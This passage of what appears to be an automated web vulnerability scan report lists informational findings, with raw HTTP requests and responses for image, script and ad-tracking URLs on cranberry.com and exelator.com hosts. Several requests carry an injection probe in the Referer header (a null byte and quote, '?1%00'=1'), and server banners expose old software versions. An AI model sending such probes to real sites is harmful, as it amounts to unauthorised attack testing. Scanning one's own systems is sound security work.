GET /img/b9808445-00af-4ade-a2e7-bffd6f80faf5/60/customfit.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=edbe4655834234a7398329be0d37d4c7; path=/
Content-Length: 1479
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.320. http://lilypad-cdn.cranberry.com/img/bc490cfe-7e4c-4ef5-baeb-86e659cfdae2/60/natemichael.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/bc490cfe-7e4c-4ef5-baeb-86e659cfdae2/60/natemichael.jpg

Request

GET /img/bc490cfe-7e4c-4ef5-baeb-86e659cfdae2/60/natemichael.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=5ff0a06d5cddee1e3d013e65692963b3; path=/
Content-Length: 1838
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.321. http://lilypad-cdn.cranberry.com/img/bfe075a0-f893-4d48-a930-31fd68330ce0/60/healthclick.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/bfe075a0-f893-4d48-a930-31fd68330ce0/60/healthclick.jpg

Request

GET /img/bfe075a0-f893-4d48-a930-31fd68330ce0/60/healthclick.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=355d5cffaa4215ac7283fa09cd367801; path=/
Content-Length: 1320
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.322. http://lilypad-cdn.cranberry.com/img/c4a97332-d896-4e47-9a95-048dc2ed0f10/60/jleonard.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/c4a97332-d896-4e47-9a95-048dc2ed0f10/60/jleonard.jpg

Request

GET /img/c4a97332-d896-4e47-9a95-048dc2ed0f10/60/jleonard.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=70f8357d5dcafdef212078e7e08c70da; path=/
Content-Length: 1639
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.323. http://lilypad-cdn.cranberry.com/img/d6364566-fb9d-4ddf-849b-16d264dabff6/60/fernleynews.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/d6364566-fb9d-4ddf-849b-16d264dabff6/60/fernleynews.jpg

Request

GET /img/d6364566-fb9d-4ddf-849b-16d264dabff6/60/fernleynews.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=2d173fb2f93e8d37b8bf6dd4be5d02d6; path=/
Content-Length: 1320
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.324. http://lilypad-cdn.cranberry.com/img/d9d8a566-1e7c-462c-86b0-4303e44608b2/60/vois.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/d9d8a566-1e7c-462c-86b0-4303e44608b2/60/vois.jpg

Request

GET /img/d9d8a566-1e7c-462c-86b0-4303e44608b2/60/vois.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=52bf16d6397dc3046acd66457dc861e6; path=/
Content-Length: 1570
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.325. http://lilypad-cdn.cranberry.com/img/e7c5104e-5c43-4d89-8e90-7c463f837121/60/stevenwyer.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/e7c5104e-5c43-4d89-8e90-7c463f837121/60/stevenwyer.jpg

Request

GET /img/e7c5104e-5c43-4d89-8e90-7c463f837121/60/stevenwyer.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=197c9309231e5ee1179708a42db3cd94; path=/
Content-Length: 1420
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.326. http://lilypad-cdn.cranberry.com/img/e846f474-057b-4233-9640-0e2f0b1f112a/60/katewalling.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/e846f474-057b-4233-9640-0e2f0b1f112a/60/katewalling.jpg

Request

GET /img/e846f474-057b-4233-9640-0e2f0b1f112a/60/katewalling.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=be839005bdfc7d39f5cdacf2058ce05e; path=/
Content-Length: 1489
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.327. http://lilypad-cdn.cranberry.com/img/f3629ed1-6277-428b-9e8a-e8456fd83831/60/scouthomestaging.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/f3629ed1-6277-428b-9e8a-e8456fd83831/60/scouthomestaging.jpg

Request

GET /img/f3629ed1-6277-428b-9e8a-e8456fd83831/60/scouthomestaging.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=bf1ce05a54df838a98460162ed840a1e; path=/
Content-Length: 1389
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.328. http://lilypad-cdn.cranberry.com/img/fdb40132-b27e-4150-a8ca-1d4473987cdc/60/affiliatetip.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/fdb40132-b27e-4150-a8ca-1d4473987cdc/60/affiliatetip.jpg

Request

GET /img/fdb40132-b27e-4150-a8ca-1d4473987cdc/60/affiliatetip.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=bf430c2de2c8f9970ed56b6cb81700f9; path=/
Content-Length: 1697
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.329. http://lilypad-cdn.cranberry.com/img/fe936a40-7d28-4120-ad40-ba37b97b26f1/60/otrtiresupply.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/fe936a40-7d28-4120-ad40-ba37b97b26f1/60/otrtiresupply.jpg

Request

GET /img/fe936a40-7d28-4120-ad40-ba37b97b26f1/60/otrtiresupply.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=145442bdef243c9ef6999cc66ace2ba1; path=/
Content-Length: 1320
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.330. http://lilypad.cranberry.com/css/osxModal.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad.cranberry.com
Path:   /css/osxModal.css

Request

GET /css/osxModal.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: lilypad.cranberry.com

Response

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 16:49:47 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: lilypad=70c7a31366da98d130927490cc0844ab; expires=Tue, 29 Mar 2011 16:49:47 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...

7.331. http://lilypad.cranberry.com/js/jquery.simplemodal-1.3.3.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad.cranberry.com
Path:   /js/jquery.simplemodal-1.3.3.min.js

Request

GET /js/jquery.simplemodal-1.3.3.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: lilypad.cranberry.com

Response

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 16:49:50 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: lilypad=e5aba8cf37b936c329fbc4d161e0e749; expires=Tue, 29 Mar 2011 16:49:50 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...

7.332. http://lilypad.cranberry.com/js/osxModal.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad.cranberry.com
Path:   /js/osxModal.js

Request

GET /js/osxModal.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: lilypad.cranberry.com

Response

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 16:49:50 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: lilypad=5f8408972e90aebb3a5a09f516db14e3; expires=Tue, 29 Mar 2011 16:49:50 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...

7.333. http://lilypad.cranberry.com/person/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad.cranberry.com
Path:   /person/new

Request

GET /person/new HTTP/1.1
Host: lilypad.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/category/All
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 401 Unauthorized
Date: Sun, 27 Feb 2011 16:49:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: lilypad=b8bdcac7a89c7fd461362047b93416c5; expires=Tue, 29 Mar 2011 16:49:18 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...

7.334. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Request

GET /load/?p=177&g=001&segment=runofit|highnetworth HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdissOwiAQAP9lv2ChrMByIoVDkx6MjYm3BqgkPWl9xIPx30Uvk8lkEnf8vjfAcQjgmkkGtZw7TIRYTNllk6stOWmylpAySfv%252FGMZDD25lQQJRadGiEAzPdZknicqH0%252B%252BTmqH3cYr7V%252FCPOcehXvw2VrNdjbwVcJ8v8vQj9g%253D%253D; myPAL=eJyNj7sOwjAMRf%252BlXjPYzqtOpwILEq0QVKgrY2dG4N%252BxixSVjSWJ4nuOde8lledSsHsUaktDEVsQEQLCABgRmm4ppNPkbUoIwpmZXBDxSE6z0Y4ElDMgEvS7yV2G2fXn0fWH2V0Zg94vJFOxqnxVVZhtm8I1zBb2Fs5%252F7jUgKMBfgDc1EsKkj0F%252FVm%252B0PmmNZWAVZEcigfxWG2Ktcxxva6X9afit5Jvu%252FQHaaUdt; BFF=eJytks0OgjAQhN%252BlT9DdBZqWi38HSQCNEKMnw9GzR%252FXdLaDS1hYS4nW%252BmV3oTqMQ1P2mgCu2XNULiQIRWHpVEANPNSDFil1Zb%252FPz5ZhVWc3SRtF4hjrdHKKdh%252BLkdWrd4wQpSaAHRBpwcMByX%252Fq%252FYl%252B6zo3%252FK7RuOmPFKuSRVh8cFlLKxJkzUBPgF7gZ8SWhNdhG4tAaDK9xMzXwqGjBJ4MaxG%252FdkCwvGUD2Z0UQQrxl0ctZefyRqZNtX3so12dcNgKy%252Feu88M3Vsu1r%252F%252FhnbmI8E3nXDtgENLyiHXqOFNbbTzGrn8E6TrQvXLKJPs2ozZ868qdKzGxA%252BNAv2AowAQ%253D%253D; TFF=eJydkzsOgzAMQO%252FSE9gmwU1YOEZXBoZK3doNcfca2gbyQy4DckDvJTaxB0%252FOT0%252BP5C8IpgcLvXOOLt3gyU93j508Fq4S4LecMx4Xvkl46j6ve4%252BDpjMkgolJpC9J%252Bd7jbXwMrzHZG%252FlLt6UqmHsALFWNEHhZLrzZ8cREad2rEeeWm%252Bhcw3TGNGKC%252Fsy4OnvSa7UeB01nSGT%252BIydaGkd7UzFfrR2PvWrtqcdB0xnyLevro5zWoWmLs4m7f0UFPsuI8nNoP5ttOptVYz3J2Oqt8MbzyjcbT3L5XBtUTEWziTI%252BBpuTZmHwqmZcXNZCSi9roZrHQdMZEo1VkfMbM9Z6Pg%253D%253D; EVX=eJy9j0sKgDAMRO%252FiCTLpJyY9THDZtUvx7loUilDQlcvhvWSYxbJt1ZSFGWUxtERlNcw2IYFcHCJOBE%252FOU9mrRdVAX2VVTaca3tRqeFKmeFM0yp1Ku42p06sm%252F1DD5zMZLB%252B5UI0In%252BT9AI54Yp0%253D

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: myPAL=eJydkL0OwjAMhN8Frxls569JpwILEq0QVKgrY2dG4N2xUymUDbEkUXz32edbjvkxZ2zvmZq8IY8NpJQICB2gR9i0cyapBqtVQkgcmcm4lCySEa3XIwDFCIgE3XY0534y3Wkw3X4yF0Yn9xNJUSwoW1HVzNpNzFXMKrYqjj%252F2VYMTAy8GXsUICKM8evkpXK95QpFFYAFEQyk5smus8zXOYbiWSLtj%252Fx3JKi0IraFCa5Yp0fyzJOkiS%252Fo8ZdTXG3wDXME%253D; expires=Thu, 28-Apr-2011 02:18:27 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJzNkz1uwzAMhe%252FiE4iUZEXykrQZaiB2g8YI2inI2Llj27tXTlSJ%252BquBIEPX9z2Stsh3NqjN54cBZprNw7TWqBCh6d4NSGCdBdw0w%252FM4Pe3eTsf%252B0E9NdzYC%252F6zhF502sc6X4bXotHrBCVpzhQUgLGCQgM1%252BLH%252FFfkyd2%252FJXWJ06pWkOyIRVvxistdZt0idQCtCDtEZ5UhuDc4msjcH6mLRmAiaGGfzWoAXS6USKvJwAfV0rglLKyeoq9%252BMxk%252FlFjn3zolIf2awAHvsfd0Opr5Vj3%252FzHWd%252BWPBMvjg2YAh5esVTkL5s5sEoPOQX%252BCjOwLVW45dvHczcmk7JAKUAP0hrlCfW3pBFGf5rNQQp4mBMXfVfyvOoq8aXbj%252BKbPVyW61JaF8JZz%252BBC3G5I1Z0idKfE3BiQ%252F52D%252BrkvXXb9gH8ABq2ndA%253D%253D; expires=Mon, 27-Jun-2011 02:18:27 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydlEESgyAMRe%252FSEyQBTMGNx%252BjWhYvOdNfuOt690baoBBx04QSd%252Fwgx%252BfTBQHg%252FA1K4INgOHHTee7q0faDwvgds5XFwlQD%252F5aj0OOlNoqf2%252B7rmOGJ1hESwWyXST0l67%252BE2PPrXkOyN%252F705VwVzB4C5qnGpGmHW25WemCitO2YyOyR6b5jOkFZIqM%252B5rc6d5JpajiNWR0hkPnAmmgan0CnY16vaQU1bllO1lziOWB0h39Rc751pNk2T9SYuPpCl1qsTkc5Da282qTeLxJzJumJXFr%252FJctKbRU%252FSfE4TsU7E0QQ%252FUOxj0ZwkM8Yrktvi1AhVcmqEShxHrI6QaN2Rv7C%252BuFSL9fUrn8bxA3afiMY%253D; expires=Mon, 27-Jun-2011 02:18:27 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sat, 27-Feb-2010 02:18:26 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sat, 27-Feb-2010 02:18:26 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJzFkUEKwzAMBP%252FiF2hlOYrkx4gcfe6x5O%252BxQyGhKbSFQo%252FSrJYBLa5%252Bb26szKiL85io3hyzJxRQaEA1iBAlONXmOOh8olMg1bW5mGX6TZWZlV4kXxUNyiQPikH5oDpupZxpfisx%252FV2C%252B0K7BZ4sLk09CzNB%252FjC8P55ehK8W6wZesYtl; expires=Mon, 27-Jun-2011 02:18:27 GMT; path=/; domain=.exelator.com
Date: Sun, 27 Feb 2011 02:18:27 GMT
Server: HTTP server
Content-Length: 981

document.write('<img src="http://ad.yieldmanager.com/pixel?id=927220&data=177001&id=927221&data=177001&id=499301&data=177001&id=716927&data=177001&t=2" width="1" height="1"></img><img src="http://www.
...[SNIP]...

7.335. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Request

GET /load/?p=204&g=011&bi=4470455573253905340&j=0 HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
Referer: http://load.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9pYi5hZG54cy5jb20vZ2V0dWlkP2h0dHA6Ly9sb2FkbS5leGVsYXRvci5jb20vbG9hZC8%2FcD0yMDQmZz0wMTEmYmk9JFVJRCZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPg%3D%3D&h=f1ffe0dba83264310d05134a36461417
Accept: */*
